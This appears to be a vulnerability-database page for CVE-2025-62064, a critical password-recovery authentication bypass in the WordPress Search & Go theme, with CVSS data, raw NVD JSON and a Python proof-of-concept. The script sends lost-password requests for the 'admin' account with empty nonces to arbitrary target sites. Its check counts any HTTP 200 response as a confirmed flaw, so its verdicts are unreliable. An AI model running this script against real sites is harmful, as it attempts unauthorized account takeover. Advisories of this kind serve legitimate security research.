Security Vulnerability Report
中文
CVE-2025-62064 CVSS 9.8 CRITICAL

CVE-2025-62064

Published: 2025-11-06 16:16:12
Last Modified: 2026-04-15 00:35:42

Description

Authentication Bypass Using an Alternate Path or Channel vulnerability in Elated-Themes Search & Go search-and-go allows Password Recovery Exploitation.This issue affects Search & Go: from n/a through <= 2.7.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Search & Go Theme <= 2.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-62064 PoC - WordPress Search & Go Theme Authentication Bypass Note: This is a conceptual PoC for educational purposes only """ import requests import argparse def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2025-62064""" # Target WordPress site with Search & Go theme target = target_url.rstrip('/') # Step 1: Identify password reset endpoint # The theme may have a custom password recovery path endpoints = [ f"{target}/wp-login.php?action=lostpassword", f"{target}/?forgot-password=true", f"{target}/wp-content/themes/search-and-go/includes/auth-lost.php" ] print(f"[*] Testing target: {target}") print(f"[*] CVE-2025-62064 - Search & Go Authentication Bypass\n") for endpoint in endpoints: try: response = requests.get(endpoint, timeout=10) if response.status_code == 200: print(f"[+] Found accessible endpoint: {endpoint}") # Step 2: Attempt password reset bypass # Exploit the missing validation in password recovery bypass_params = { 'user_login': 'admin', # Target admin account 'redirect_to': '', # Additional parameters that may bypass validation '_wpnonce': '', 'action': 'lostpassword' } post_response = requests.post(endpoint, data=bypass_params, timeout=10) # Check for successful password reset initiation if 'reset' in post_response.text.lower() or post_response.status_code == 200: print(f"[!] Potential vulnerability confirmed at {endpoint}") print(f"[!] Password reset may have been initiated without proper validation") return True except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") print("\n[*] Manual verification recommended") print("[*] Check for missing nonce validation or direct database manipulation") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-62064 PoC') parser.add_argument('-t', '--target', required=True, help='Target WordPress URL') args = parser.parse_args() check_vulnerability(args.target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62064", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:12.327", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Elated-Themes Search & Go search-and-go allows Password Recovery Exploitation.This issue affects Search & Go: from n/a through <= 2.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/search-and-go/vulnerability/wordpress-search-go-theme-2-7-broken-authentication-vulnerability?_s_id=cve", "source": "[email protected]"}]}}